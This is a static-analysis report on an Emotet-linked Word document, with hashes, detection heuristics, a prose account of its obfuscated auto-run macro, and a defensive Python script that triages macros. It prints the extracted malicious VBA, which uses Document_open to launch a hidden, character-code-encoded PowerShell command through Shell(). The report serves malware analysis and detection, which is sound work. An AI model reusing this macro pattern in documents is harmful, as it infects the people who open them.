Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 98d56cef36192b71…

MALICIOUS

Office (OLE)

Size: 100.0 KB
Created: 2018-06-15 12:56:00
Authoring application: Microsoft Office Word
First seen: 2018-09-04
MD5: 98f0a437f665697843eec09d1f7d4daf
SHA-1: cf0c64fb60ff6d8c91b9f5efd8a1d9cdc37c6d3d
SHA-256: 98d56cef36192b7190837c97932e71ef73b2e97670d1ce2fe84d9faa549a62ba
Risk Score: 222

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

The sample contains VBA macros, including a Document_open auto-execution procedure (VBA procedure names are case-insensitive, so the lower-case spelling still fires when the document is opened with macros enabled). Document_open calls the function TnAkb, which invokes VBA.Shell(). Apart from that call, the statements in both procedures are junk arithmetic on undeclared variables, kept from raising errors by On Error Resume Next; the Shell() call is the only operative statement. Its command line is assembled at run time from fragments: Chr(WqvbPTbYGtP + vbKeyP + aJNTzabBdkw) evaluates to "P" (vbKeyP is the key-code constant 80, and the two variables, which are never assigned, are Empty and so count as 0), the literal "owers" follows, and the next operand is the helper function vvhoiOiw from the second module, whose string literals begin "HeLL  ( (" followed by comma-separated numbers in the printable-ASCII range. Read in source order the visible fragments spell PowersHeLL, consistent with a PowerShell launch whose real command is encoded as character codes; the rest of the command line lies in the truncated part of the source. The window-style argument is written as 5839 - 5839, which is 0 (vbHide), so the child process runs with no visible window. This is the download-and-execute behaviour of a second-stage loader, and ClamAV names the document as Emotet, a known downloader family.

Heuristics (6)

  • ClamAV: Doc.Downloader.Emotet-6877382-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6877382-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The macro calls Shell(), which starts an external program
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open runs automatically when the document is opened (once macros are enabled)
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace URI that Office writes into drawing parts, not a download or C2 location, so it carries no indicator value on its own.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 16451 bytes
SHA-256: c10e677ca163f1e752253bf5bbeb9b221e5ae1f06e7e1ab737e9dd05b5164af4

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "zvBTHhZiXunAaS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function TnAkb()
On Error Resume Next
djrdu = 53500 + NCBbSD + (45010 * CDbl(WbbDY) - Tmhnta / CSng(5607) - AzYVp / Hex(rvUItc) + 71818 - 14223)
ZziVE = Sqr(28700)
sSAfJz = qABXM - EDwOm / 27228 / GTJvJM - 223327908 + Hex(InOEwm) * FFUJb - Round(89928)
KKASis = lWTWZ
oZIEWz = 37900 + DlwYZ + (92545 * CDbl(zcEKTp) - MRqkGY / CSng(73675) - wWHwRj / Hex(Qnibkb) + 41115 - 91607)
zJGYaM = Sqr(45916)
wMMrO = qvPSna - biSBL / 32504 / sFBqVJ - 223327908 + Hex(zROJlw) * zFTFCA - Round(76016)
iHsFZF = VCQiq
KWVFBt = 57011 + IBcjb + (49821 * CDbl(wJQtMj) - IAtNTi / CSng(83393) - qHFGuz / Hex(wzuBUz) + 62078 - 85843)
wEoaFf = Sqr(95315)
JRNUL = azJNLV - VfCMMQ / 98034 / PtcIK - 223327908 + Hex(OqQpK) * nwckO - Round(71739)
VIhVPX = nWOvqi
OwHtYk = 24582 + XLJsY + (374 * CDbl(nZDSw) - GiIFHH / CSng(70475) - qpEDz / Hex(LjCDzB) + 70333 - 74918)
tRNUM = Sqr(37880)
VTORI = woRcc - hVEpbD / 743 / WzSwq - 223327908 + Hex(VOntm) * jpTlo - Round(61527)
UCKlV = HaYlN
TnAkb = bsoshUSH + VBA.Shell(IEYZXV + Chr(WqvbPTbYGtP + vbKeyP + aJNTzabBdkw) + "owers" + vvhoiOiw + MBMLXoVl + coAVE + hcqsppXqvr + dlpCMXIVLXv + npsESALX, 5839 - 5839)
MiWAR = 50223 + wkAYqD + (26147 * CDbl(CTAvQJ) - JNwXD / CSng(26005) - ZLHVNX / Hex(zkWFw) + 86833 - 94931)
NjWZN = Sqr(70234)
brBCm = JEuWb - KpRUq / 81099 / EiipRQ - 223327908 + Hex(wzPBdz) * DjQUKl - Round(80702)
rhNmWZ = FmpcmR
nzBjmJ = 47786 + otsbQ + (12479 * CDbl(BAfFq) - CCGul / CSng(79916) - CEVuT / Hex(QmOlY) + 52503 - 32922)
riquOj = Sqr(32254)
LzipOl = voAUzG - XzIzqT / 74348 / HdZmK - 223327908 + Hex(PzXJI) * tWQdE - Round(60062)
jbjWin = wLfjj
End Function
Private Sub Document_open()
On Error Resume Next
IvsAPc = 51348 + jpcLrz + (81834 * CDbl(hfsKc) - TjWIO / CSng(5283) - WNGSL / Hex(ziPNcE) + 32611 - 73777)
uvaYR = Sqr(19747)
GYfUp = IdHNXS - bWsfA / 86449 / SSQGL - 223327908 + Hex(Mpaipl) * KHimqJ - Round(40404)
SwXHRX = LsmQq
soHZJH = 30973 + DZXmU + (99000 * CDbl(nFpqX) - jMCZM / CSng(10566) - QXnRNK / Hex(TaNjB) + 9437 - 5465)
jquicK = Sqr(71029)
FhAmMb = zzCiC - lGZJhB / 24394 / IoTwwj - 223327908 + Hex(fidXf) * ikMYGr - Round(42163)
lFOjw = fYDuYY
TnAkb
zshnN = 90967 + UOZLXF + (7384 * CDbl(MkbJq) - Ypwwul / CSng(53214) - NhOHU / Hex(sfkswc) + 88089 - 40338)
KdzqPI = Sqr(70072)
zhaZD = pSJRJB - zPkTcj / 99395 / NNkDOm - 223327908 + Hex(zvMBc) * PZuLp - Round(90863)
jzWAD = kVUvIY
llTqWo = 96849 + VOEIY + (56297 * CDbl(pqInlE) - bCAji / CSng(48158) - jXaZs / Hex(dGDoAw) + 49852 - 6698)
GcuGi = Sqr(45330)
Ozrjb = RpmJZ - mqiij / 710 / jmTmo - 223327908 + Hex(GCvYpY) * jMIahL - Round(3089)
ZmLkTj = NNXmc
End Sub


Attribute VB_Name = "oNCqXMRhct"
Function vvhoiOiw()
On Error Resume Next
zzTjo = Sqr(36363)
tHAkTw = 16527 + FaozwK + (11468 * CDbl(UJpmw) - PVmHuH / CSng(43666) - MtaUCO / Hex(TGfrk) + 6647 - 46238)
fQvFs = wMEAPN - uXiHr / 99156 / DJvLl - 223327908 + Hex(wmHbbh) * COJYz - Round(42557)
IzNzw = mKnUVC
uJpAbEBHRb = "HeLL  ( (" + " 4" + "6 ,100 ,96 ,123" + " , 94, 102" + ", 105 ,42 " + ",55 ,42, 100" + ", 111" + ",125 ,39," + " 101," + " 104, 9"
QnBzwP = Sqr(32383)
RHVUjT = 3046 + LEdZho + (23265 * CDbl(NFKVJf) - iFqvh / CSng(35582) - lPmsH / Hex(sppdUG) + 19481 - 79389)
Tflzn = sYURA - NnohR / 78255 / PhACV - 223327908 + Hex(koDtj) * uUPSN - Round(40702)
VtbqVp = dcVLp
nawllioajlA = "6 , 111,105 ,12" + "6 , 4" + "2, 120,107 ,10" + "0 ,110 ,1" + "01" + ",103" + ", 49,46,1" + "04 , 96, 64, "
aPtCY = Sqr(74486)
IrBTTc = 31087 + Dapikv + (12502 * CDbl(wUbMUk) - SbANMz / CSng(98881) - EaDNC / Hex(vzkES) + 2295 - 97703)
XHLYt = rTPDjD - lEhiD / 58351 / VrHBi - 223327908 + Hex(KBlTJZ) * CjSrp - Round(17375)
EZzFAp = WkdzT
ZQLca = "82," + "125,89,42 , " + "55" + " ,42 ,100,11" + "1,1" + "25, 39,101" + ",104 " + ",96, 111 , 105"
HfFVR = Sqr(7135
... (truncated)
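The chain described in the summary (Document_open calling TnAkb, which calls VBA.Shell with a command assembled from Chr(vbKeyP), literals and helper results, and a window style folded from 5839 - 5839) can be checked mechanically rather than by eye. The script below is an added example written for this page; it is not output of the analysis tool and not part of the sample. It runs over a constructed, trimmed copy of the macro extracted above. Its assumptions: identifiers assigned nowhere in the visible source are undeclared VBA variables (Empty, which is 0 in arithmetic); Shell() calls are located by name; and helper calls and unresolved variables are left as {name} placeholders instead of being guessed, since their values sit in the truncated modules.

```python
# Added example for this page (not the analysis tool's code): static triage of a VBA macro dump.
import ast
import operator
import re
import string
# Constructed sample: a trimmed copy of the macro extracted above (Document_open -> TnAkb -> VBA.Shell).
SAMPLE_VBA = r'''Function TnAkb()
On Error Resume Next
djrdu = 53500 + NCBbSD + (45010 * CDbl(WbbDY) - Tmhnta / CSng(5607) + 71818 - 14223)
TnAkb = bsoshUSH + VBA.Shell(IEYZXV + Chr(WqvbPTbYGtP + vbKeyP + aJNTzabBdkw) + "owers" + vvhoiOiw + MBMLXoVl, 5839 - 5839)
End Function
Private Sub Document_open()
TnAkb
End Sub
Function vvhoiOiw()
uJpAbEBHRb = "HeLL  ( (" + " 4" + "6 ,100 ,96 ,123" + " , 94, 102" + ", 105 ,42 "
nawllioajlA = "6 , 111,105 ,12" + "6 , 4" + "2, 120,107 ,10" + "0 ,110 ,1" + "01"
End Function
'''

AUTOEXEC = {"document_open", "document_close", "autoopen", "autoclose", "auto_open", "workbook_open"}
PROC_RE = re.compile(r"^[ \t]*(?:(?:Private|Public)\s+)?(Sub|Function)\s+(\w+)\s*\([^\n]*\n"
                     r"(.*?)^[ \t]*End\s+\1\b", re.I | re.M | re.S)
SHELL_RE = re.compile(r"\bShell\s*\(", re.I)
LITERAL_ASSIGN_RE = re.compile(r'^[ \t]*(\w+)[ \t]*=[ \t]*((?:"[^"\n]*"[ \t]*[+&][ \t]*)*"[^"\n]*")[ \t]*$', re.M)
# vbKeyA..vbKeyZ and vbKey0..vbKey9 equal the ASCII code of the key's character (vbKeyP = 80).
VB_CONST = {("vbKey" + c).lower(): ord(c) for c in string.ascii_uppercase + string.digits}
WINDOW_STYLE = {0: "vbHide", 1: "vbNormalFocus", 2: "vbMinimizedFocus", 3: "vbMaximizedFocus"}
OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}

def const_eval(expr, procs):
    """Fold integer + - * over literals, vbKey* constants and bare names. Assumption:
    a name that is neither a constant nor a procedure is undeclared, i.e. Empty (0)."""
    def subst(m):
        if m.group(0).lower() in procs:
            raise ValueError(f"{m.group(0)}() is a call, not a static value")
        return str(VB_CONST.get(m.group(0).lower(), 0))
    def ev(n):
        if isinstance(n, ast.BinOp) and type(n.op) in OPS:
            return OPS[type(n.op)](ev(n.left), ev(n.right))
        if isinstance(n, ast.Constant) and isinstance(n.value, int):
            return n.value
        raise ValueError(f"unsupported expression: {expr}")
    return ev(ast.parse(re.sub(r"\b[A-Za-z_]\w*\b", subst, expr).strip(), mode="eval").body)

def split_top_level(text, sep):
    """Split on `sep` outside parentheses and strings; an unmatched ')' ends the scan."""
    parts, depth, in_str = [""], 0, False
    for ch in text:
        if ch == '"':
            in_str = not in_str
        elif not in_str and ch in "()":
            depth += 1 if ch == "(" else -1
            if depth < 0:
                break
        elif not in_str and ch == sep and depth == 0:
            parts.append("")
            continue
        parts[-1] += ch
    return [p.strip() for p in parts]

def render_term(term, procs):
    """Render one '+' operand of the Shell() command string as far as statics allow."""
    if term.startswith('"') and term.endswith('"'):
        return term[1:-1].replace('""', '"')
    m = re.fullmatch(r"Chr\s*\((.*)\)", term, re.I | re.S)
    if m:
        return chr(const_eval(m.group(1), procs))
    # Helper calls and never-assigned variables stay as placeholders rather than being guessed.
    return "{" + term + ("()}" if term.lower() in procs else "}")

def rebuild_shell_command(body, procs):
    """Rebuild the first Shell() call's command string and decode its window-style argument."""
    args = split_top_level(body[SHELL_RE.search(body).end():], ",")
    command = "".join(render_term(t, procs) for t in split_top_level(args[0], "+"))
    style = const_eval(args[1], procs) if len(args) > 1 else 2  # omitted: minimized with focus
    return {"command": command, "window_style": style, "style_name": WINDOW_STYLE.get(style, "other")}

def literal_string_vars(body):
    """Resolve assignments built only from string literals joined with + or &."""
    return {name: "".join(re.findall(r'"([^"\n]*)"', rhs))
            for name, rhs in LITERAL_ASSIGN_RE.findall(body)}

def path_to_shell(procs, name, seen=()):
    """Depth-first call path from `name` to the first procedure that calls Shell(), else None."""
    if SHELL_RE.search(procs[name]):
        return [name]
    for callee in procs.keys() & {w.lower() for w in re.findall(r"\b[A-Za-z_]\w*\b", procs[name])}:
        if callee not in seen and (tail := path_to_shell(procs, callee, seen + (name,))):
            return [name] + tail
    return None

def triage(src):
    """Report for one macro dump: auto-exec call paths, rebuilt Shell() command, literal strings."""
    procs = {m.group(2).lower(): m.group(3) for m in PROC_RE.finditer(src)}
    paths = {e: p for e in procs.keys() & AUTOEXEC if (p := path_to_shell(procs, e))}
    return {"autoexec_to_shell": paths,
            "shell": {e: rebuild_shell_command(procs[p[-1]], procs) for e, p in paths.items()},
            "string_vars": {k: v for b in procs.values() for k, v in literal_string_vars(b).items()}}
```

Calling triage(SAMPLE_VBA) returns the auto-exec path document_open → tnakb, the partially rebuilt command {IEYZXV}Powers{vvhoiOiw()}{MBMLXoVl} with window style 0 (vbHide), and the literal strings the helper assembles, the first of which begins "HeLL  ( (". The placeholders are deliberate: the same pass over the full extract would need the truncated modules to resolve them, and a triage script that silently treated unknown names as empty strings would hide exactly the fragments an analyst has to chase next. The regex-based procedure parser is intentionally simple and will not follow calls made through CallByName, Application.Run or late-bound COM objects; those show up in the p-code heuristic above, not here.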